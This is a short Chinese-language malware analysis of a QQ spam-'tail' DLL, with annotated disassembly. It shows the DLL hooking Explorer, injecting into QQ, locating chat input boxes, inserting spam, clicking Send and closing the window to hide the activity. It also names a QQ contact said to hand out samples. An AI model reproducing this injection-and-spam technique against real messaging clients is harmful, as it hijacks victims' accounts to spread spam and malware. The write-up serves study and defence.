QQ尾巴
没有载体,只有个dll,不大好分析。。。
简单说下原理吧````:
00786165 |. BA 20637800 mov edx, 00786320 ; ASCII "Explorer.Exe"
0078616A |. A1 6C877800 mov eax, dword ptr ds:[78876C]
0078616F |. E8 78EAFFFF call 00784BEC \\设置全局挂钩
00786174 |. F6D8 neg al
00786176 |. 1BC0 sbb eax, eax
00786178 |. 8B15 04727800 mov edx, dword ptr ds:[787204] ; Info_Ms.007870BC
0078617E |. 8902 mov dword ptr ds:[edx], eax
00786180 |. BA 38637800 mov edx, 00786338 ; ASCII "Qq.Exe"
00786185 |. A1 6C877800 mov eax, dword ptr ds:[78876C]
0078618A |. E8 5DEAFFFF call 00784BEC \\检测QQ进程启动,注入。
0078616A |. A1 6C877800 mov eax, dword ptr ds:[78876C]
0078616F |. E8 78EAFFFF call 00784BEC \\设置全局挂钩
00786174 |. F6D8 neg al
00786176 |. 1BC0 sbb eax, eax
00786178 |. 8B15 04727800 mov edx, dword ptr ds:[787204] ; Info_Ms.007870BC
0078617E |. 8902 mov dword ptr ds:[edx], eax
00786180 |. BA 38637800 mov edx, 00786338 ; ASCII "Qq.Exe"
00786185 |. A1 6C877800 mov eax, dword ptr ds:[78876C]
0078618A |. E8 5DEAFFFF call 00784BEC \\检测QQ进程启动,注入。
查找当前激活状态中#32770窗口类:
00785899 |. 6A 00 push 0 ; /Title = NULL
0078589B |. 68 88597800 push 00785988 ; |Class = "#32770"
007858A0 |. 6A 00 push 0 ; |hAfterWnd = NULL
007858A2 |. 8B45 FC mov eax, dword ptr ss:[ebp-4>; |
007858A5 |. 50 push eax ; |hParent
007858A6 |. E8 CDE7FFFF call <jmp.&user32.FindWindowE>; \FindWindowExA
007858AB |. 8BF8 mov edi, eax
007858AD |. 85FF test edi, edi
007858AF |. 0F84 AF000000 je 00785964
0078589B |. 68 88597800 push 00785988 ; |Class = "#32770"
007858A0 |. 6A 00 push 0 ; |hAfterWnd = NULL
007858A2 |. 8B45 FC mov eax, dword ptr ss:[ebp-4>; |
007858A5 |. 50 push eax ; |hParent
007858A6 |. E8 CDE7FFFF call <jmp.&user32.FindWindowE>; \FindWindowExA
007858AB |. 8BF8 mov edi, eax
007858AD |. 85FF test edi, edi
007858AF |. 0F84 AF000000 je 00785964
查找QQ按钮:
007858B5 |. 68 90597800 push 00785990 ; /Title = ""B7,"",A2,"送(&S)"
007858BA |. 68 9C597800 push 0078599C ; |Class = "Button"
007858BF |. 6A 00 push 0 ; |hAfterWnd = NULL
007858C1 |. 57 push edi ; |hParent
007858C2 |. E8 B1E7FFFF call <jmp.&user32.FindWindowE>; \FindWindowExA
007858C7 |. 8945 F4 mov dword ptr ss:[ebp-C], ea>
007858CA |. 837D F4 00 cmp dword ptr ss:[ebp-C], 0
007858CE |. 0F84 90000000 je 00785964
007858D4 |. 33DB xor ebx, ebx
AfxWnd42这个是什么,聊天信息缓存?
007858D6 |> 6A 00 /push 0 ; /Title = NULL
007858D8 |. 68 A4597800 |push 007859A4 ; |Class = "AfxWnd42"
007858DD |. 53 |push ebx ; |hAfterWnd
007858DE |. 57 |push edi ; |hParent
007858DF |. E8 94E7FFFF |call <jmp.&user32.FindWindow>; \FindWindowExA
007858E4 |. 8BD8 |mov ebx, eax
007858E6 |. 85DB |test ebx, ebx
007858E8 |. 74 7A |je short 00785964
007858EA |. 6A 00 |push 0 ; /Title = NULL
查找聊天的输入框(闪光标的那个):
007858EC |. 68 B0597800 |push 007859B0 ; |Class = "RICHEDIT"
007858F1 |. 6A 00 |push 0 ; |hAfterWnd = NULL
007858F3 |. 53 |push ebx ; |hParent
007858F4 |. E8 7FE7FFFF |call <jmp.&user32.FindWindow>; \FindWindowExA
007858F9 |. 8BF0 |mov esi, eax
007858FB |. 85F6 |test esi, esi
007858FD |. 75 11 |jnz short 00785910
007858FF |. 6A 00 |push 0 ; /Title = NULL
消息窗体:
00785901 |. 68 BC597800 |push 007859BC ; |Class = "RichEdit20A"
00785906 |. 6A 00 |push 0 ; |hAfterWnd = NULL
00785908 |. 53 |push ebx ; |hParent
00785909 |. E8 6AE7FFFF |call <jmp.&user32.FindWindow>; \FindWindowExA
0078590E |. 8BF0 |mov esi, eax
00785910 |> 85F6 |test esi, esi
00785912 |.^ 74 C2 \je short 007858D6
00785914 |. 6A FF push -1 ; /lParam = FFFFFFFF
00785916 |. 6A 00 push 0 ; |wParam = 0
查找QQ文本窗口:
00784B43 |. 52 push edx ; /lParam
00784B44 |. 68 04010000 push 104 ; |wParam = 104
00784B49 |. 6A 0D push 0D ; |Message = WM_GETTEXT
00784B4B |. 50 push eax ; |hWnd
00784B4C |. E8 5FF5FFFF call <jmp.&user32.SendMessageA> ; \SendMessageA
00784B44 |. 68 04010000 push 104 ; |wParam = 104
00784B49 |. 6A 0D push 0D ; |Message = WM_GETTEXT
00784B4B |. 50 push eax ; |hWnd
00784B4C |. E8 5FF5FFFF call <jmp.&user32.SendMessageA> ; \SendMessageA
发送给QQ的消息:
00785918 |. 68 B1000000 push 0B1 ; |Message = EM_SETSEL
0078591D |. 56 push esi ; |hWnd
0078591E |. E8 8DE7FFFF call <jmp.&user32.SendMessage>; \SendMessageA
00785923 |. 8D45 F8 lea eax, dword ptr ss:[ebp-8>
00785926 |. E8 75DAFFFF call 007833A0
0078592B |. 50 push eax ; /lParam
0078592C |. 6A 00 push 0 ; |wParam = 0
输入消息后,“发送”。并立即关闭窗口。(以免被发觉自己QQ在发送垃圾信息):
0078592E |. 68 C2000000 push 0C2 ; |Message = EM_REPLACESEL
00785933 |. 56 push esi ; |hWnd
00785934 |. E8 77E7FFFF call <jmp.&user32.SendMessage>; \SendMessageA
00785939 |. 6A 00 push 0 ; /lParam = 0
0078593B |. 6A 00 push 0 ; |wParam = 0
0078593D |. 68 F5000000 push 0F5 ; |Message = BM_CLICK
00785942 |. 8B45 F4 mov eax, dword ptr ss:[ebp-C>; |
00785945 |. 50 push eax ; |hWnd
00785946 |. E8 65E7FFFF call <jmp.&user32.SendMessage>; \SendMessageA
0078594B |. 68 F4010000 push 1F4 ; /Timeout = 500. ms
00785950 |. E8 EBE6FFFF call <jmp.&kernel32.Sleep> ; \Sleep
00785955 |. 6A 00 push 0 ; /lParam = 0
00785957 |. 6A 00 push 0 ; |wParam = 0
00785959 |. 6A 10 push 10 ; |Message = WM_CLOSE
0078595B |. 8B45 FC mov eax, dword ptr ss:[ebp-4>; |
0078595E |. 50 push eax ; |hWnd
0078595F |. E8 4CE7FFFF call <jmp.&user32.SendMessage>; \SendMessageA
总体:
1、注入QQ,并查找活动窗口标题:“聊天中”“群”“会话中”。
2、找到的话,则满足条件,在文本框跟上垃圾消息,并自己发送信息。
3、立即关闭QQ聊天窗口,避免受害者发现自己QQ在发垃圾信息。
后话:那个QQ(714220)加他的话,跟他聊,他会给你个样本,应该是"教程.exe"
QQpass。。。(垃圾病毒,只会再E盘生成副本```鄙视)